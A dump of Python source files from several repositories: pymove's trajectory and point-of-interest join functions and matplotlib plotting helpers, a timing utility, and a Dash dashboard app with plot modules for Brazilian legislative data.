)
event_type = np.full(data.shape[0], '', dtype='object_')
event_id = np.full(data.shape[0], '', dtype='object_')
return window_starts, window_ends, current_distances, event_id, event_type
def _reset_set_window_and_creates_event_id_type_all(
data: DataFrame, df_events: DataFrame, label_date: Text, time_window: int
) -> Tuple[Series, Series, ndarray, ndarray, ndarray]:
"""
Resets the indexes of the dataframes, set time window, and returns
the current distance between the two dataframes, and return their
respective variables (event_id, event_type).
Parameters
----------
data : DataFrame
The input trajectory data.
df_events : DataFrame
The input event point of interest data.
label_date : str
Label of data referring to the datetime.
time_window : Int
Number of seconds of the time window.
Returns
-------
window_starts, window_ends, current_distances, event_id, event_type
arrays with default values for join operation
"""
# get a vector with windows time to each point
data.reset_index(drop=True, inplace=True)
df_events.reset_index(drop=True, inplace=True)
# compute windows time
window_starts = data[label_date] - Timedelta(seconds=time_window)
window_ends = data[label_date] + Timedelta(seconds=time_window)
# create vector to store distances
current_distances = np.full(
data.shape[0], None, dtype=np.ndarray
)
event_type = np.full(data.shape[0], None, dtype=np.ndarray)
event_id = np.full(data.shape[0], None, dtype=np.ndarray)
return window_starts, window_ends, current_distances, event_id, event_type
def join_with_pois(
data: DataFrame,
df_pois: DataFrame,
label_id: Optional[Text] = TRAJ_ID,
label_poi_name: Optional[Text] = NAME_POI,
reset_index: Optional[Text] = True
):
"""
Performs the integration between trajectories and points
of interest, generating two new columns referring to the
name and the distance from the point of interest closest
to each point of the trajectory.
Parameters
----------
data : DataFrame
The input trajectory data.
df_pois : DataFrame
The input point of interest data.
label_id : str, optional
Label of df_pois referring to the Point of Interest id, by default TRAJ_ID
label_poi_name : str, optional
Label of df_pois referring to the Point of Interest name, by default NAME_POI
reset_index : bool, optional
Flag for reset index of the df_pois and data dataframes before the join,
by default True
"""
print('Integration with POIs...')
values = _reset_and_creates_id_and_lat_lon(data, df_pois, True, reset_index)
current_distances, ids_POIs, tag_POIs, lat_user, lon_user = values
for idx, row in progress_bar(data.iterrows(), total=len(data)):
# create a vector to each lat
lat_user.fill(row[LATITUDE])
lon_user.fill(row[LONGITUDE])
# computing distances to idx
distances = np.float64(
haversine(
lat_user,
lon_user,
df_pois[LATITUDE].values,
df_pois[LONGITUDE].values,
)
)
# get index to arg_min and min distance
index_min = np.argmin(distances)
current_distances[idx] = np.min(distances)
# setting data for a single object movement
ids_POIs[idx] = df_pois.at[index_min, label_id]
tag_POIs[idx] = df_pois.at[index_min, label_poi_name]
data[ID_POI] = ids_POIs
data[DIST_POI] = current_distances
data[NAME_POI] = tag_POIs
print('Integration with POI was finalized')
def join_with_pois_optimizer(
data,
df_pois: DataFrame,
label_id: Optional[Text] = TRAJ_ID,
label_poi_name: Optional[Text] = NAME_POI,
dist_poi: Optional[List] = None,
reset_index: Optional[Text] = True
):
"""
Performs the integration between trajectories and points
of interest, generating two new columns referring to the
name and distance from the nearest point of interest,
within the limit of distance determined by the parameter 'dist_poi',
of each point in the trajectory.
Parameters
----------
data : DataFrame
The input trajectory data.
df_pois : DataFrame
The input point of interest data.
label_id : str, optional
Label of df_pois referring to the Point of Interest id, by default TRAJ_ID
label_poi_name : str, optional
Label of df_pois referring to the Point of Interest name, by default NAME_POI
dist_poi : list, optional
List containing the minimum distance limit between each type of
point of interest and each point of the trajectory to classify the
point of interest closest to each point of the trajectory, by default None
reset_index : bool, optional
Flag for reset index of the df_pois and data dataframes before the join,
by default True
"""
print('Integration with POIs optimized...')
if len(df_pois[label_poi_name].unique()) == len(dist_poi):
values = _reset_and_creates_id_and_lat_lon(data, df_pois, False, reset_index)
minimum_distances, ids_POIs, tag_POIs, lat_POI, lon_POI = values
df_pois.rename(
columns={label_id: TRAJ_ID, label_poi_name: NAME_POI},
inplace=True
)
for idx, row in progress_bar(df_pois.iterrows(), total=len(df_pois)):
# update lat and lon of current index
lat_POI.fill(row[LATITUDE])
lon_POI.fill(row[LONGITUDE])
# First iteration is minimum distances
if idx == 0:
minimum_distances = np.float64(
haversine(
lat_POI,
lon_POI,
data[LATITUDE].values,
data[LONGITUDE].values
)
)
ids_POIs.fill(row.id)
tag_POIs.fill(row.type_poi)
else:
# compute dist between a POI and ALL
print(data[LONGITUDE].values)
current_distances = np.float64(
haversine(
lat_POI,
lon_POI,
data[LATITUDE].values,
data[LONGITUDE].values
)
)
compare = current_distances < minimum_distances
index_True = np.where(compare is True)[0]
minimum_distances = np.minimum(
current_distances, minimum_distances, dtype=np.float64
)
if index_True.shape[0] > 0:
ids_POIs[index_True] = row.id
tag_POIs[index_True] = row.type_poi
data[ID_POI] = ids_POIs
data[DIST_POI] = minimum_distances
data[NAME_POI] = tag_POIs
print('Integration with POI was finalized')
else:
print('the size of the dist_poi is different from the size of pois')
def join_with_pois_by_category(
data: DataFrame,
df_pois: DataFrame,
label_category: Optional[Text] = TYPE_POI,
label_id: Optional[Text] = TRAJ_ID
):
"""
It performs the integration between trajectories and points
of interest, generating new columns referring to the
category and distance from the nearest point of interest
that has this category at each point of the trajectory.
Parameters
----------
data : DataFrame
The input trajectory data.
df_pois : DataFrame
The input point of interest data.
label_category : str, optional
Label of df_pois referring to the point of interest category, by default TYPE_POI
label_id : str, optional
Label of df_pois referring to the point of interest id, by default TRAJ_ID
"""
print('Integration with POIs...')
# get a vector with windows time to each point
data.reset_index(drop=True, inplace=True)
df_pois.reset_index(drop=True, inplace=True)
# create numpy array to store new column to DataFrame of movement objects
current_distances = np.full(
data.shape[0], np.Infinity, dtype=np.float64
)
ids_POIs = np.full(data.shape[0], np.NAN, dtype='object_')
unique_categories = df_pois[label_category].unique()
size_categories = len(unique_categories)
print('There are %s categories' % size_categories)
for i, c in enumerate(unique_categories, start=1):
# creating lat and lon array to operation
df_category = df_pois[df_pois[label_category] == c]
df_category.reset_index(drop=True, inplace=True)
desc = 'computing dist to {} category ({}/{})'.format(c, i, size_categories)
for idx, row in progress_bar(data.iterrows(), total=len(data), desc=desc):
lat_user = np.full(
df_category.shape[0], row[LATITUDE], dtype=np.float64
)
lon_user = np.full(
df_category.shape[0], row[LONGITUDE], dtype=np.float64
)
# computing distances to
distances = haversine(
lat_user,
lon_user,
df_category[LATITUDE].values,
df_category[LONGITUDE].values,
)
# get index to arg_min and min distance
index_min = np.argmin(distances)
# setting data for a single object movement
current_distances[idx] = np.min(distances)
ids_POIs[idx] = df_category.at[index_min, label_id]
data['id_%s' % c] = ids_POIs
data['dist_%s' % c] = current_distances
print('Integration with POI was finalized')
def join_with_poi_datetime(
data: DataFrame,
df_events: DataFrame,
label_date: Optional[Text] = DATETIME,
time_window: Optional[int] = 900,
label_event_id: Optional[Text] = EVENT_ID,
label_event_type: Optional[Text] = EVENT_TYPE
):
"""
It performs the integration between trajectories and points
of interest, generating new columns referring to the
category of the point of interest, the distance from the
nearest point of interest based on time of each point of
the trajectories.
Parameters
----------
data : DataFrame
The input trajectory data.
df_events : DataFrame
The input events points of interest data.
label_date : str, optional
Label of data referring to the datetime of the input trajectory data,
by default DATETIME
time_window : float, optional
tolerable length of time range for assigning the event's
point of interest to the trajectory point, by default 900
label_event_id : str, optional
Label of df_events referring to the id of the event, by default EVENT_ID
label_event_type : str, optional
Label of df_events referring to the type of the event, by default EVENT_TYPE
"""
print('Integration with Events...')
values = _reset_set_window__and_creates_event_id_type(
data, df_events, label_date, time_window
)
window_starts, window_ends, current_distances, event_id, event_type = values
for idx in progress_bar(data.index):
# filter event by datetime
df_filtered = filters.by_datetime(
df_events, window_starts[idx], window_ends[idx]
)
size_filter = df_filtered.shape[0]
if size_filter > 0:
df_filtered.reset_index(drop=True, inplace=True)
lat_user = np.full(
size_filter, data.at[idx, LATITUDE], dtype=np.float64
)
lon_user = np.full(
size_filter, data.at[idx, LONGITUDE], dtype=np.float64
)
# compute dist to poi filtered
distances = haversine(
lat_user,
lon_user,
df_filtered[LATITUDE].values,
df_filtered[LONGITUDE].values,
)
# get index to arg_min
index_arg_min = np.argmin(distances)
# get min distances
min_distance = np.min(distances)
# store data
current_distances[idx] = min_distance
event_type[idx] = df_filtered.at[index_arg_min, label_event_type]
event_id[idx] = df_filtered.at[index_arg_min, label_event_id]
data[label_event_id] = event_id
data[DIST_EVENT] = current_distances
data[label_event_type] = event_type
print('Integration with event was completed')
def join_with_poi_datetime_optimizer(
data: DataFrame,
df_events: DataFrame,
label_date: Optional[Text] = DATETIME,
time_window: Optional[int] = 900,
label_event_id: Optional[Text] = EVENT_ID,
label_event_type: Optional[Text] = EVENT_TYPE
):
"""
It performs a optimized integration between trajectories and points
of interest of events, generating new columns referring to
the category of the event, the distance from the nearest
event and the time when the event happened at each point of
the trajectories.
Parameters
----------
data : DataFrame
The input trajectory data.
df_events : DataFrame
The input events points of interest data.
label_date : str, optional
Label of data referring to the datetime of the input trajectory data,
by default DATETIME
time_window : float, optional
tolerable length of time range for assigning the event's
point of interest to the trajectory point, by default 900
label_event_id : str, optional
Label of df_events referring to the id of the event, by default EVENT_ID
label_event_type : str, optional
Label of df_events referring to the type of the event, by default EVENT_TYPE
"""
print('Integration with Events...')
values = _reset_set_window__and_creates_event_id_type(
data, df_events, label_date, time_window
)
window_starts, window_ends, current_distances, event_id, event_type = values
minimum_distances = np.full(
data.shape[0], np.Infinity, dtype=np.float64
)
# Rename for access columns of each row directly
df_events.rename(
columns={label_event_id: label_event_id, label_event_type: label_event_type},
inplace=True
)
for idx, row in progress_bar(df_events.iterrows(), total=len(df_events)):
df_filtered = filters.by_datetime(
data, window_starts[idx], window_ends[idx]
)
size_filter = df_filtered.shape[0]
if size_filter > 0:
indexes = df_filtered.index
lat_event = np.full(
df_filtered.shape[0], row[LATITUDE], dtype=np.float64
)
lon_event = np.full(
df_filtered.shape[0], row[LONGITUDE], dtype=np.float64
)
# First iteration is minimum distances
if idx == 0:
minimum_distances[indexes] = haversine(
lat_event,
lon_event,
df_filtered[LATITUDE].values,
df_filtered[LONGITUDE].values,
)
event_id[indexes] = row.event_id
event_type[indexes] = row.event_type
else:
current_distances[indexes] = haversine(
lat_event,
lon_event,
df_filtered[LATITUDE].values,
df_filtered[LONGITUDE].values,
)
compare = current_distances < minimum_distances
index_True = np.where(compare is True)[0]
minimum_distances = np.minimum(
current_distances, minimum_distances
)
event_id[index_True] = row.event_id
event_type[index_True] = row.event_type
data[label_event_id] = event_id
data[DIST_EVENT] = minimum_distances
data[label_event_type] = event_type
print('Integration with events was completed')
def join_with_pois_by_dist_and_datetime(
data: DataFrame,
df_pois: DataFrame,
label_date: Optional[Text] = DATETIME,
label_event_id: Optional[Text] = EVENT_ID,
label_event_type: Optional[Text] = EVENT_TYPE,
time_window: Optional[float] = 3600,
radius: Optional[float] = 1000,
):
"""
It performs the integration between trajectories and points of interest,
generating new columns referring to the category of the point of interest,
the distance between the location of the user and location of the poi
based on the distance and on time of each point of the trajectories.
Parameters
----------
data : DataFrame
The input trajectory data.
df_pois : DataFrame
The input events points of interest data.
label_date : str, optional
Label of data referring to the datetime of the input trajectory data,
by default DATETIME
label_event_id : str, optional
Label of df_events referring to the id of the event, by default EVENT_ID
label_event_type : str, optional
Label of df_events referring to the type of the event, by default EVENT_TYPE
time_window : float, optional
tolerable length of time range for assigning the event's
point of interest to the trajectory point, by default 3600
radius: float, optional
maximum radius of pois, by default 1000
"""
print('Integration with Events...')
if label_date not in df_pois:
raise KeyError("POI's DataFrame must contain a %s column" % label_date)
values = _reset_set_window_and_creates_event_id_type_all(
data, df_pois, label_date, time_window
)
window_start, window_end, current_distances, event_id, event_type = values
for idx, row in progress_bar(data.iterrows(), total=data.shape[0]):
# set min and max of coordinates by radius
bbox = filters.get_bbox_by_radius(
(row[LATITUDE], row[LONGITUDE]), radius
)
# filter event by radius
df_filtered = filters.by_bbox(
df_pois, bbox
)
# filter event by datetime
filters.by_datetime(
df_filtered,
start_datetime=window_start[idx],
end_datetime=window_end[idx],
inplace=True
)
# get df_filtered size
size_filter = df_filtered.shape[0]
if size_filter > 0:
# reseting index of data frame
df_filtered.reset_index(drop=True, inplace=True)
# create lat and lon array to operation
lat_user = np.full(
size_filter, row[LATITUDE], dtype=np.float64
)
lon_user = np.full(
size_filter, row[LONGITUDE], dtype=np.float64
)
# calculate of distances between points
distances = haversine(
lat_user,
lon_user,
df_filtered[LATITUDE].to_numpy(),
df_filtered[LONGITUDE].to_numpy()
)
current_distances[idx] = distances
event_type[idx] = df_filtered[label_event_type].to_numpy(dtype=np.ndarray)
event_id[idx] = df_filtered[label_event_id].to_numpy(dtype=np.ndarray)
data[label_event_id] = event_id
data[DIST_EVENT] = current_distances
data[label_event_type] = event_type
print('Integration with event was completed')
def join_with_home_by_id(
data: DataFrame,
df_home: DataFrame,
label_id: Optional[Text] = TRAJ_ID,
label_address: Optional[Text] = ADDRESS,
label_city: Optional[Text] = CITY,
drop_id_without_home: Optional[bool] = False,
):
"""
It performs the integration between trajectories and home points,
generating new columns referring to the distance of the nearest
home point, address and city of each trajectory point.
Parameters
----------
data : DataFrame
The input trajectory data.
df_home : DataFrame
The input home points data.
label_id : str, optional
Label of df_home referring to the home point id, by default TRAJ_ID
label_address : str, optional
Label of df_home referring to the home point address, by default ADDRESS
label_city : str, optional
Label of df_home referring to the point city, by default CITY
drop_id_without_home : bool, optional
flag as an option to drop id's that don't have houses, by default FALSE
"""
print('Integration with Home...')
ids_without_home = []
if data.index.name is None:
print('...setting {} as index'.format(label_id))
data.set_index(label_id, inplace=True)
for idx in progress_bar(data.index.unique()):
filter_home = df_home[label_id] == idx
if df_home[filter_home].shape[0] == 0:
print('...id: {} has not HOME'.format(idx))
ids_without_home.append(idx)
else:
home = df_home[filter_home].iloc[0]
lat_user = data.at[idx, LATITUDE].values
lon_user = data.at[idx, LONGITUDE].values
# if user has a single tuple
if not isinstance(lat_user, np.ndarray):
lat_home = home[LATITUDE].values
lon_home = home[LONGITUDE].values
data.at[idx, DIST_HOME] = haversine(
lat_user, lon_user, lat_home, lon_home
)
data.at[idx, HOME] = home[label_address]
data.at[idx, label_city] = home[label_city]
else:
lat_home = np.full(
data.loc[idx].shape[0], home[LATITUDE], dtype=np.float64
)
lon_home = np.full(
data.loc[idx].shape[0], home[LONGITUDE], dtype=np.float64
)
data.at[idx, DIST_HOME] = haversine(
lat_user, lon_user, lat_home, lon_home
)
data.at[idx, HOME] = np.array(home[label_address])
data.at[idx, label_city] = np.array(home[label_city])
data.reset_index(inplace=True)
print('... Resetting index')
if drop_id_without_home:
data.drop(data.loc[data[TRAJ_ID].isin(ids_without_home)].index, inplace=True)
def merge_home_with_poi(
data: DataFrame,
label_dist_poi: Optional[Text] = DIST_POI,
label_name_poi: Optional[Text] = NAME_POI,
label_id_poi: Optional[Text] = ID_POI,
label_home: Optional[Text] = HOME,
label_dist_home: Optional[Text] = DIST_HOME,
drop_columns: Optional[bool] = True,
):
"""
Perform or merge the points of interest and the starting
points assigned as trajectories, considering the starting
points as other points of interest, generating a new
DataFrame.
Parameters
----------
data : DataFrame
The input trajectory data, with join_with_pois and join_with_home_by_id applied.
label_dist_poi : str, optional
Label of data referring to the distance from the nearest point of interest,
by default DIST_POI
label_name_poi : str, optional
Label of data referring to the name from the nearest point of interest,
by default NAME_POI
label_id_poi : str, optional
Label of data referring to the id from the nearest point of interest,
by default ID_POI
label_home : str, optional
Label of df_home referring to the home point, by default HOME
label_dist_home: str, optional
Label of df_home referring to the distance to the home point,
by default DIST_HOME
drop_columns : bool, optional
Flag that controls the deletion of the columns referring to the
id and the distance from the home point, by default True
"""
print('merge home with POI using shortest distance')
idx = data[data[label_dist_home] <= data[label_dist_poi]].index
data.loc[idx, label_name_poi] = label_home
data.loc[idx, label_dist_poi] = data.loc[idx, label_dist_home]
data.loc[idx, label_id_poi] = data.loc[idx, label_home]
if(drop_columns):
data.drop(columns=[label_dist_home, label_home], inplace=True)
```
#### File: pymove/visualization/matplotlib.py
```python
from typing import TYPE_CHECKING, Any, Callable, List, Optional, Text, Tuple, Union
import matplotlib.pyplot as plt
from matplotlib.pyplot import figure
from pandas.core.frame import DataFrame
from pymove.utils.constants import (
DATE,
DAY,
HOUR,
LATITUDE,
LONGITUDE,
PERIOD,
TID,
TRAJ_ID,
)
if TYPE_CHECKING:
from pymove.core.dask import DaskMoveDataFrame
from pymove.core.pandas import PandasMoveDataFrame
def show_object_id_by_date(
move_data: Union['PandasMoveDataFrame', 'DaskMoveDataFrame'],
create_features: Optional[bool] = True,
kind: Optional[List] = None,
figsize: Optional[Tuple[float, float]] = (21, 9),
return_fig: Optional[bool] = True,
save_fig: Optional[bool] = True,
name: Optional[Text] = 'shot_points_by_date.png',
) -> Optional[figure]:
"""
Generates four visualizations based on datetime feature:
- Bar chart trajectories by day periods
- Bar chart trajectories day of the week
- Line chart trajectory by date
- Line chart of trajectory by hours of the day.
Parameters
----------
move_data : pymove.core.MoveDataFrameAbstract subclass.
Input trajectory data.
create_features : bool, optional
Represents whether or not to delete features created for viewing,
by default True.
kind: list, optional
Determines the kinds of each plot, by default None
figsize : tuple, optional
Represents dimensions of figure, by default (21,9).
return_fig : bool, optional
Represents whether or not to save the generated picture, by default True.
save_fig : bool, optional
Represents whether or not to save the generated picture, by default True.
name : String, optional
Represents name of a file, by default 'shot_points_by_date.png'.
Returns
-------
figure
The generated picture or None
References
----------
https://matplotlib.org/3.1.1/api/_as_gen/matplotlib.pyplot.plot.html
"""
if kind is None:
kind = ['bar', 'bar', 'line', 'line']
fig, ax = plt.subplots(2, 2, figsize=figsize)
move_data.generate_date_features()
move_data.generate_hour_features()
move_data.generate_time_of_day_features()
move_data.generate_day_of_the_week_features()
move_data.groupby([PERIOD])[TRAJ_ID].nunique().plot(
subplots=True, kind=kind[0], rot=0, ax=ax[0][0], fontsize=12
)
move_data.groupby([DAY])[TRAJ_ID].nunique().plot(
subplots=True, kind=kind[1], ax=ax[0][1], rot=0, fontsize=12
)
move_data.groupby([DATE])[TRAJ_ID].nunique().plot(
subplots=True,
kind=kind[2],
grid=True,
ax=ax[1][0],
rot=90,
fontsize=12,
)
move_data.groupby([HOUR])[TRAJ_ID].nunique().plot(
subplots=True, kind=kind[3], grid=True, ax=ax[1][1], fontsize=12
)
if not create_features:
move_data.drop(columns=[DATE, HOUR, PERIOD, DAY], inplace=True)
if save_fig:
plt.savefig(fname=name, fig=fig)
if return_fig:
return fig
def plot_trajectories(
move_data: DataFrame,
markers: Optional[Text] = 'o',
markersize: Optional[float] = 12,
figsize: Optional[Tuple[float, float]] = (10, 10),
return_fig: Optional[bool] = True,
save_fig: Optional[bool] = True,
name: Optional[Text] = 'trajectories.png',
) -> Optional[figure]:
"""
Generate a visualization that show trajectories.
Parameters
----------
move_data: dataframe
Dataframe with trajectories
markers : str, optional
Represents visualization type marker, by default 'o'
markersize : float, optional
Represents visualization size marker, by default 12
figsize : tuple(float, float), optional
Represents dimensions of figure, by default (10, 10)
return_fig : bool, optional
Represents whether or not to return the generated picture, by default True
save_fig : bool, optional
Represents whether or not to save the generated picture, by default False
name : str, optional
Represents name of a file, by default 'trajectories.png'
Returns
-------
figure
The generated picture or None
"""
fig = plt.figure(figsize=figsize)
ids = move_data['id'].unique()
for id_ in ids:
self_id = move_data[move_data['id'] == id_]
plt.plot(
self_id[LONGITUDE],
self_id[LATITUDE],
markers,
markersize=markersize,
)
if save_fig:
plt.savefig(fname=name, fig=fig)
if return_fig:
return fig
def plot_traj_by_id(
move_data: DataFrame,
id_: Union[int, Text],
label: Optional[Text] = TID,
feature: Optional[Text] = None,
value: Optional[Any] = None,
linewidth: Optional[float] = 3,
markersize: Optional[float] = 20,
figsize: Optional[Tuple[float, float]] = (10, 10),
return_fig: Optional[bool] = True,
save_fig: Optional[bool] = True,
name: Optional[Text] = None,
) -> Optional[figure]:
"""
Generate a visualization that shows a trajectory with the specified tid.
Parameters
----------
move_data: dataframe
Dataframe with trajectories
id_ : int, str
Represents the trajectory tid
label : str, optional
Feature with trajectories tids, by default TID
feature : str, optional
Name of the feature to highlight on plot, by default None
value : any, optional
Value of the feature to be highlighted as green marker, by default None
linewidth : float, optional
Represents visualization size line, by default 2
markersize : float, optional
Represents visualization size marker, by default 20
figsize : tuple(float, float), optional
Represents dimensions of figure, by default (10, 10)
return_fig : bool, optional
Represents whether or not to return the generated picture, by default True
save_fig : bool, optional
Represents whether or not to save the generated picture, by default False
name : str, optional
Represents name of a file, by default None
Returns
-------
PandasMoveDataFrame', figure
Trajectory with the specified tid.
The generated picture.
Raises
------
KeyError
If the dataframe does not contains the TID feature
IndexError
If there is no trajectory with the tid passed
"""
if label not in move_data:
raise KeyError('%s feature not in dataframe' % label)
df_ = move_data[move_data[label] == id_]
if not len(df_):
raise IndexError(f'No trajectory with tid {id_} in dataframe')
fig = plt.figure(figsize=figsize)
if (not feature) or (not value) or (feature not in df_):
plt.plot(df_[LONGITUDE], df_[LATITUDE])
plt.plot(
df_.loc[:, LONGITUDE], df_.loc[:, LATITUDE],
'r.', markersize=markersize / 2
)
else:
filter_ = df_[feature] == value
df_nodes = df_.loc[filter_]
df_points = df_.loc[~filter_]
plt.plot(df_[LONGITUDE], df_[LATITUDE], linewidth=linewidth)
plt.plot(
df_nodes[LONGITUDE], df_nodes[LATITUDE], 'gs', markersize=markersize / 2
)
plt.plot(
df_points[LONGITUDE], df_points[LATITUDE], 'r.', markersize=markersize / 2
)
plt.plot(
df_.iloc[0][LONGITUDE], df_.iloc[0][LATITUDE], 'yo', markersize=markersize
) # start point
plt.plot(
df_.iloc[-1][LONGITUDE], df_.iloc[-1][LATITUDE], 'yX', markersize=markersize
) # end point
if save_fig:
if not name:
name = 'trajectory_%s.png' % id_
plt.savefig(fname=name, fig=fig)
if return_fig:
return fig
def plot_all_features(
move_data: DataFrame,
dtype: Optional[Callable] = float,
figsize: Optional[Tuple[float, float]] = (21, 15),
return_fig: Optional[bool] = True,
save_fig: Optional[bool] = True,
name: Optional[Text] = 'features.png',
) -> Optional[figure]:
"""
Generate a visualization for each columns that type is equal dtype.
Parameters
----------
move_data: dataframe
Dataframe with trajectories
dtype : callable, optional
Represents column type, by default np.float64
figsize : tuple(float, float), optional
Represents dimensions of figure, by default (21, 15)
return_fig : bool, optional
Represents whether or not to return the generated picture, by default True
save_fig : bool, optional
Represents whether or not to save the generated picture, by default False
name : str, optional
Represents name of a file, by default 'features.png'
Returns
-------
figure
The generated picture or None
Raises
------
AttributeError
If there are no columns with the specified type
"""
col_dtype = move_data.select_dtypes(include=[dtype]).columns
tam = col_dtype.size
if not tam:
raise AttributeError('No columns with dtype %s.' % dtype)
fig, ax = plt.subplots(tam, 1, figsize=figsize)
ax_count = 0
for col in col_dtype:
ax[ax_count].set_title(col)
move_data[col].plot(subplots=True, ax=ax[ax_count])
ax_count += 1
if save_fig:
plt.savefig(fname=name, fig=fig)
if return_fig:
return fig
``` |
{
"source": "JoaoCarabetta/salarios-servidores-federais",
"score": 4
} |
#### File: salarios-servidores-federais/src/utils.py
```python
from timeit import default_timer
import os
class Timer(object):
def __init__(self, verbose=False):
self.verbose = verbose
self.timer = default_timer
def __enter__(self):
self.start = self.timer()
return self
def __exit__(self, *args):
end = self.timer()
self.elapsed_secs = end - self.start
self.elapsed = self.elapsed_secs # millisecs
if self.verbose:
print('elapsed time: {0:.2f} s'.format(self.elapsed))
``` |
{
"source": "JoaoCarabetta/viz-parallel",
"score": 2
} |
#### File: JoaoCarabetta/viz-parallel/app.py
```python
import dash
import dash_core_components as dcc
import dash_html_components as html
import flask
from dash.dependencies import Input, Output
import yaml
import glob
from collections import defaultdict
# noinspection PyDeprecation
import imp
from components import components
from methods import wrap_infos
# CONFIG APP
server = flask.Flask(__name__)
app = dash.Dash(name='app1', sharing=True, server=server, csrf_protect=False)
# CONSTANTS
options_properties = [yaml.load(open(path, 'r')) for path in glob.glob('plots/*/config.yaml')]
# BUILD OPTIONS FUNCTIONS
options_functions = defaultdict(lambda: dict())
def add_functions(path, keyword, opt):
for base_path in glob.glob(path):
base_name = base_path.split('/')[1]
# noinspection PyDeprecation
opt[base_name][keyword] = imp.load_source('info', base_path).output[keyword]
return opt
options_functions = add_functions('plots/*/infos.py', 'infos', options_functions)
options_functions = add_functions('plots/*/plot.py', 'plot', options_functions)
options_functions = add_functions('plots/*/get_raw_data.py', 'raw_data', options_functions)
# Set the number of columns
columns = 2
# Config needed to do complex callbacks
app.config.supress_callback_exceptions = True
# App Layout
app.layout = html.Div([
# title
html.Div([
html.H1('Estrutura de tramitações',
style={'margin-top': '10',
'margin-bottom': '-5',
'text-align': 'center'})
],
className='row'
),
html.Div([
html.Hr()
], className='ten columns offset-by-one'),
# graph selection
html.Div([
html.Div([
html.P('Selecione o gráfico a ser mostrado:'),
dcc.RadioItems(
id='graph-selector',
options=[{'label': option['full_name'],
'value': option['back_name']}
for option in options_properties],
value=options_properties[0]['back_name'],
labelStyle={'display': 'inline-block'}
)
],
className='twelve columns offset-by-one'
),
]
),
# filters
html.Div(id='menu',
className='ten columns offset-by-one'
),
html.Div([
html.Br()
], className='twelve columns'),
# graphs comparisson
html.Div(
id='output-container',
className='twelve columns'
),
]
)
# General Functions
def generate_ids(value, col, func):
return "{value}-{column}-{function}".format(value=value, column=col, function=func)
def get_back_name_properties(back_name):
return [dic for dic in options_properties if dic['back_name'] == back_name][0]
def filter_data(back_name, callback_input):
options = get_back_name_properties(back_name)['variables']
filtered_data = options_functions[back_name]['raw_data']
for variables in options:
filtered_data = components[variables['type']].filter(callback_input=callback_input,
extra_options=variables,
raw_data=filtered_data)
return filtered_data
# Create Menus
@app.callback(Output('menu', 'children'),
[Input('graph-selector', 'value')])
def update_menu(back_name):
menus = []
for opt in options_properties:
if opt['back_name'] == back_name:
for column in range(columns):
container = []
i = 0
for variables in opt['variables']:
menu_header = html.H3(opt['full_name'] + ' ' + str(column + 1))
menu_title = html.P('Selecione um(a) {}'.format(variables['menu_text']))
if i == 0:
container.append(html.Div([html.Br(), html.Hr(), menu_header, menu_title],
className='ten columns offset-by-one'))
else:
container.append(html.Div([html.Br(), menu_title], className='ten columns offset-by-one'))
i += 1
kwargs = dict(id=generate_ids(variables['data_title'], column, 'menu'),
className='ten columns offset-by-one',
raw_data=options_functions[back_name]['raw_data'],
column_name=variables['column_name'],
back_name=back_name,
data_title=variables['data_title'],
extra_options=variables['options'])
container.append(components[variables['type']].component(kwargs=kwargs))
menus.append(html.Div(container, className='six columns'))
return menus
# Create Output Containers
@app.callback(
Output('output-container', 'children'),
[Input('graph-selector', 'value')])
def display_controls(back_name):
# Create a unique output container for each pair of dynamic controls
graphs = html.Div(
[dcc.Graph(id=generate_ids(back_name, column, 'graph'),
className='six columns',
style={'text-align': 'center'}) for column in range(columns)])
space = html.Div([
html.Br()
], className='twelve columns offset-by-one')
info = html.Div(
[html.Div(
id=generate_ids(back_name, column, 'info'),
className='six columns',
style={'text-align': 'center'})
for column in range(columns)])
return [graphs, space, info, space]
# Call Graph Function
def generate_output_callback_graph(back_name):
def return_graph(*values):
inp = dict()
for opt in options_properties:
if opt['back_name'] == back_name:
for i, val in enumerate(opt['variables']):
inp[val['data_title']] = values[i]
return options_functions[back_name]['plot'](inp,
options_functions[back_name]['raw_data'],
filter_data(back_name, inp))
return return_graph
# Call Info Function
def generate_output_callback_info(back_name):
def return_info(*values):
inp = dict()
for opt in options_properties:
if opt['back_name'] == back_name:
for i, val in enumerate(opt['variables']):
inp[val['data_title']] = values[i]
infos = options_functions[back_name]['infos'](inp,
options_functions[back_name]['raw_data'],
filter_data(back_name, inp))
return wrap_infos(infos)
return return_info
# Set callbacks from menu
for back_name in [o['value'] for o in app.layout['graph-selector'].options]:
for column in range(columns):
callback_input = []
for opt in options_properties:
if opt['back_name'] == back_name:
for variables in opt['variables']:
callback_input.append(Input(generate_ids(variables['data_title'],
column,
'menu'),
'value'))
app.callback(
Output(
generate_ids(back_name, column, 'graph'), 'figure'),
callback_input)(
generate_output_callback_graph(back_name)
)
app.callback(
Output(
generate_ids(back_name, column, 'info'), 'children'),
callback_input)(
generate_output_callback_info(back_name)
)
# Append css
app.css.append_css({"external_url": "https://codepen.io/JoaoCarabetta/pen/RjzpPB.css"})
if __name__ == '__main__':
app.run_server()
```
#### File: plots/numero_pls_apresentadas/plot.py
```python
import pandas as pd
import plotly.graph_objs as go
from plots.numero_pls_apresentadas.get_raw_data import output
import imp
def draw_plot_1(input, raw_data, filtered_data):
periodo = input['tempo-numero']
# raw_data['dataInicio'] = pd.to_datetime(raw_data['dataInicio'])
# df = raw_data[raw_data['dataInicio'] >= str(periodo[0])]
# df = df[df['dataInicio'] <= str(periodo[1])]
df = filtered_data
anos = df['dataInicio'].dt.year
qtde = df['numero_pls']
trace = [go.Bar(
y=qtde,
x=anos,
opacity=0.75,
text=['Qtde: {}<br>Ano: {}'.format(i, j) for i, j in zip(qtde, anos)],
hoverinfo='text',
name='Ano',
marker=dict(
color='#2DA37D'
),
showlegend=False
)
]
layout = go.Layout(
xaxis=dict(title='Anos'),
yaxis=dict(title='Número de PLs')
)
figure = dict(data=trace, layout=layout)
return figure
# noinspection PyRedeclaration
output = {"plot": draw_plot_1}
```
#### File: viz-parallel/plot_template/plot.py
```python
import pandas as pd
import plotly.graph_objs as go
# Do not change this function name and inputs
def plot(callback_input: dict, raw_data: pd.DataFrame, filtered_data: pd.DataFrame) -> object:
"""
This function have to be responsible on transforming raw and rude data on beautiful plots.
You can filter the data by yourself or use the filtered data DataFrame to plot.
The callback_input is a dict that contains the information set by the user using the components. The key is the
data-title given at config.py and the value can be a int/float/str/tuple, depending on the component.
The dictionary containing the information has the following structure:
{'name' : 'Mean: ',
'value': int/float/str}
:param callback_input: Filters
:param raw_data: Raw data
:param filtered_data: Already filtered data
:return: Plotly Figure
"""
return figure
# Do not change this
output = {'plot': plot}
if __name__ == '__main__':
pass
``` |
{
